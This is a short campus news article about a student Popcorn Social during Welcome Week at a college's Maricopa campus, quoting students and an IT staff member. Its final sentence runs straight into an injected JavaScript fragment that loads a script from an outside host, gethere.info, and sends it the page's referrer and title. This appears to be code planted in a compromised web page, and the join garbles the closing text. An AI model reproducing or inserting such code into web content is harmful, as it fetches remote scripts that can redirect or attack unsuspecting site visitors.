Pop Back into the Semester with Maricopa!
February 23, 2015
Welcome Week, running from January 20th to January 22nd, has been full of student-friendly activities and events, one in particular being the Popcorn Social!
The Popcorn Social, held January 21st from 4pm to 6pm at the Maricopa campus, was designed to introduce students to one another in order to create a more welcoming environment on campus.
“This event has been an awesome way to meet new students with our lives intersecting at this one event. The people seemed to be very eager to meet one another,” stated Devin Thornock, a fellow CAC student. “Hey! Everyone loves popcorn!” he exclaimed.
Devin’s opinion was shared by all who attended as more students gathered at the C-building patio.
Kimberly Cousins, another CAC student, added, “It was a cool event. A nice pick me up after a long day.”
As students chit chatted at the event, they learned about everyone’s different backgrounds and why they chose to attend CAC to study. This event, brought to you by Student Leadership, was a great way to get to know some of the new faces on campus.
Not only was the event open to students, but also staff. Gabriel Bueras, our trusty CAC IT member here at the Maricopa campus, stated, “I like the variety!” in reference to the choice between classic buttered popcorn or kettle corn.
Popcorn. Not just a movie viewer’s snack of choice, but a food destined to bring people together. It is a social food. One to have a hand in as you share stories and get better acquainted with one another. The event was a success and was a pleasant way to end the day!s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
